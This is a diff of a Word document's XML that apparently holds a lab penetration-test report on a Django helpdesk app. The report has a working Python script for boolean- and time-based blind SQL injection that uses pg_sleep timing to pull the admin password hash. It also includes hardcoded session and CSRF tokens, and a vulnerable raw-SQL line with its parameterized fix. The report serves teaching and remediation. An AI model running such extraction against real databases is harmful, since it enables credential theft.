-            <w:r>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>f"ascii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>        if oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cond</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>):</w:t>
+              <w:t>        cond = f"ascii(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>        if oracle(cond):</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3980,15 +3581,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    length = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_length</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(SUBQUERY)</w:t>
+              <w:t>    length = get_length(SUBQUERY)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4020,15 +3613,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">        c = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_char</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(SUBQUERY, pos)</w:t>
+              <w:t>        c = get_char(SUBQUERY, pos)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4138,33 +3723,18 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">[3/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbk</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">[4/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbkd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">[5/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbkdf</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>[3/89] pbk</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>[4/89] pbkd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>[5/89] pbkdf</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -4624,15 +4194,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Objective 4 was achieved. A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>boolean</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-based blind SQL injection, using the presence or absence of an injected UNION row as a true/false oracle, was automated with a Python script to recover the administrator's full password hash one character at a time, without the response ever displaying the data directly.</w:t>
+        <w:t>Objective 4 was achieved. A boolean-based blind SQL injection, using the presence or absence of an injected UNION row as a true/false oracle, was automated with a Python script to recover the administrator's full password hash one character at a time, without the response ever displaying the data directly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4653,15 +4215,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Objective 4's oracle relied on a visible difference between responses (an extra row present or absent, changing the match count). For this objective, the response content is made identical on every request, whether the injected condition is true or false: the UNION SELECT always contributes exactly one row with the same value, so the page always renders "1 match." with the same blank field. The only thing that changes is how long the server takes to reply, controlled by wrapping the condition in a CASE expression that calls PostgreSQL's </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pg_sleep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>().</w:t>
+        <w:t>Objective 4's oracle relied on a visible difference between responses (an extra row present or absent, changing the match count). For this objective, the response content is made identical on every request, whether the injected condition is true or false: the UNION SELECT always contributes exactly one row with the same value, so the page always renders "1 match." with the same blank field. The only thing that changes is how long the server takes to reply, controlled by wrapping the condition in a CASE expression that calls PostgreSQL's pg_sleep().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4824,6 +4378,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076CBCBA" wp14:editId="1EC96603">
             <wp:extent cx="6858000" cy="3152775"/>
@@ -4880,36 +4437,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>True</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> condition</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: identical response body, 3985 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ms</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> response time</w:t>
+        <w:t>Figure 5.2a: True condition: identical response body, 3985 ms response time</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5059,19 +4587,14 @@
         <w:t xml:space="preserve">Result: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">The condition is false. The response body was 12,115 bytes, effectively identical to the true case above (same structure, same "1 match."), but Burp's timer showed only 384 milliseconds, the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pg_sleep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(0) branch. The only observable difference between a true and a false answer is this ~3.6-second gap in response time; the page content gives no indication either way.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>The condition is false. The response body was 12,115 bytes, effectively identical to the true case above (same structure, same "1 match."), but Burp's timer showed only 384 milliseconds, the pg_sleep(0) branch. The only observable difference between a true and a false answer is this ~3.6-second gap in response time; the page content gives no indication either way.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7190EB55" wp14:editId="2F18E076">
@@ -5129,30 +4652,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Figure 5.2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>False</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> condition: identical response body, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">384 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ms</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> response time</w:t>
+        <w:t>Figure 5.2b: False condition: identical response body, 384 ms response time</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5211,15 +4711,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Recovers </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>auth_user.password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> for username='admin' one character at a time.</w:t>
+              <w:t>Recovers auth_user.password for username='admin' one character at a time.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5243,15 +4735,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">a conditional </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pg_sleep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>() delays the reply when the condition is true.</w:t>
+              <w:t>a conditional pg_sleep() delays the reply when the condition is true.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5301,23 +4785,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve"># Grab a fresh </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sessionid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>csrftoken</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> from Burp (Proxy &gt; HTTP history) before running.</w:t>
+              <w:t># Grab a fresh sessionid/csrftoken from Burp (Proxy &gt; HTTP history) before running.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5333,31 +4801,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>csrftoken</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sessionid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
+              <w:t>    "csrftoken": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    "sessionid": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5387,15 +4839,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">SUBQUERY = "SELECT password FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>auth_user</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> WHERE username='admin'"</w:t>
+              <w:t>SUBQUERY = "SELECT password FROM auth_user WHERE username='admin'"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5424,31 +4868,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>def oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>: str) -&gt; bool:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>    """True if the response took noticeably longer than baseline (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> was true)."""</w:t>
+              <w:t>def oracle(condition_sql: str) -&gt; bool:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    """True if the response took noticeably longer than baseline (condition_sql was true)."""</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5472,31 +4900,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>        f"(SELECT CASE WHEN ({</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">}) THEN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pg_sleep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">({SLEEP_SECONDS}) ELSE </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pg_sleep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(0) END)::text,"</w:t>
+              <w:t>        f"(SELECT CASE WHEN ({condition_sql}) THEN pg_sleep({SLEEP_SECONDS}) ELSE pg_sleep(0) END)::text,"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5520,15 +4924,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    start = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>time.perf_counter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>()</w:t>
+              <w:t>    start = time.perf_counter()</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5544,15 +4940,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    elapsed = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>time.perf_counter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>() - start</w:t>
+              <w:t>    elapsed = time.perf_counter() - start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5573,15 +4961,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">def </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_length</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(subquery: str) -&gt; int:</w:t>
+              <w:t>def get_length(subquery: str) -&gt; int:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5613,15 +4993,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>        if oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>f"LENGTH</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(({subquery})) &gt; {mid}"):</w:t>
+              <w:t>        if oracle(f"LENGTH(({subquery})) &gt; {mid}"):</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5666,15 +5038,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">def </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_char</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(subquery: str, pos: int) -&gt; str:</w:t>
+              <w:t>def get_char(subquery: str, pos: int) -&gt; str:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5706,39 +5070,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">        </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cond</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>f"ascii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>        if oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cond</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>):</w:t>
+              <w:t>        cond = f"ascii(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>        if oracle(cond):</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5791,15 +5131,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    length = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_length</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(SUBQUERY)</w:t>
+              <w:t>    length = get_length(SUBQUERY)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5832,15 +5164,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">        c = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_char</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(SUBQUERY, pos)</w:t>
+              <w:t>        c = get_char(SUBQUERY, pos)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5950,33 +5274,18 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">[3/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbk</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">[4/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbkd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">[5/89] </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pbkdf</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>[3/89] pbk</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>[4/89] pbkd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>[5/89] pbkdf</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -6423,23 +5732,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">No part of the response body was ever used as a signal; every response for this endpoint has the same structure and, for the payloads used here, the same reported match count. The only quantity measured was wall-clock elapsed time between issuing each HTTP request and receiving its complete response (captured in the script with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>time.perf_counter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(), and visually confirmed in Burp's response timer). A delay of roughly 2 seconds or more above baseline indicated the injected condition was true, since it meant the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pg_sleep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(2) branch of the CASE expression had executed; a near-instant response indicated the condition was false. This timing side-channel made it possible to recover the admin password hash one character at a time even though the two possible outcomes were visually indistinguishable.</w:t>
+        <w:t>No part of the response body was ever used as a signal; every response for this endpoint has the same structure and, for the payloads used here, the same reported match count. The only quantity measured was wall-clock elapsed time between issuing each HTTP request and receiving its complete response (captured in the script with time.perf_counter(), and visually confirmed in Burp's response timer). A delay of roughly 2 seconds or more above baseline indicated the injected condition was true, since it meant the pg_sleep(2) branch of the CASE expression had executed; a near-instant response indicated the condition was false. This timing side-channel made it possible to recover the admin password hash one character at a time even though the two possible outcomes were visually indistinguishable.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6469,15 +5762,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Objective 5 was achieved. By hiding a conditional </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pg_sleep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() inside the injected query, the response body was kept identical regardless of the truth of the injected condition, forcing all inference onto a timing side-channel. An automated script measuring response latency recovered the administrator's full password hash one character at a time using only elapsed time, with no visible difference in any response.</w:t>
+        <w:t>Objective 5 was achieved. By hiding a conditional pg_sleep() inside the injected query, the response body was kept identical regardless of the truth of the injected condition, forcing all inference onto a timing side-channel. An automated script measuring response latency recovered the administrator's full password hash one character at a time using only elapsed time, with no visible difference in any response.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6501,23 +5786,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">All five objectives exploited a single line in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>advanced_ticket_search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/helpdesk/views/staff.py), the view backing the "Advanced Ticket Search" feature. The user-supplied search term was concatenated directly into a raw SQL string with Python's + operator before being executed:</w:t>
+        <w:t>All five objectives exploited a single line in advanced_ticket_search() (src/helpdesk/views/staff.py), the view backing the "Advanced Ticket Search" feature. The user-supplied search term was concatenated directly into a raw SQL string with Python's + operator before being executed:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6546,45 +5815,24 @@
             <w:pPr>
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> = (</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    "SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    "FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> "</w:t>
+            <w:r>
+              <w:t>sql = (</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "SELECT id, title, submitter_email, status "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "FROM helpdesk_ticket "</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6615,21 +5863,8 @@
             <w:pPr>
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cursor.execute</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>)</w:t>
+            <w:r>
+              <w:t>cursor.execute(sql)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6640,23 +5875,7 @@
         <w:spacing w:before="160"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Because term (taken directly from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>request.GET</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">["q"] with no validation) was spliced into the SQL text itself, a single quote in the search box could break out of the intended string literal and inject arbitrary SQL, which is what every payload in Objectives 1 through 5 relied on. The same view also wrapped the term in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mark_safe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() before rendering it back into the page, disabling Django's automatic HTML escaping for fully attacker-controlled input; this is a secondary, independent XSS vulnerability in the same function, fixed at the same time.</w:t>
+        <w:t>Because term (taken directly from request.GET["q"] with no validation) was spliced into the SQL text itself, a single quote in the search box could break out of the intended string literal and inject arbitrary SQL, which is what every payload in Objectives 1 through 5 relied on. The same view also wrapped the term in mark_safe() before rendering it back into the page, disabling Django's automatic HTML escaping for fully attacker-controlled input; this is a secondary, independent XSS vulnerability in the same function, fixed at the same time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6669,23 +5888,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The fix uses a parameterized query: the SQL text contains a placeholder (%s) instead of the value, and the value is passed separately to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cursor.execute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">() as a parameter. The database driver sends the query and the value over two different channels, so Postgres always treats the value as data, never as executable SQL, regardless of what characters it contains. The unsafe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mark_safe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() call on the echoed search term was also removed, restoring Django's default auto-escaping.</w:t>
+        <w:t>The fix uses a parameterized query: the SQL text contains a placeholder (%s) instead of the value, and the value is passed separately to cursor.execute() as a parameter. The database driver sends the query and the value over two different channels, so Postgres always treats the value as data, never as executable SQL, regardless of what characters it contains. The unsafe mark_safe() call on the echoed search term was also removed, restoring Django's default auto-escaping.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6714,45 +5917,24 @@
             <w:pPr>
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> = (</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    "SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    "FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> "</w:t>
+            <w:r>
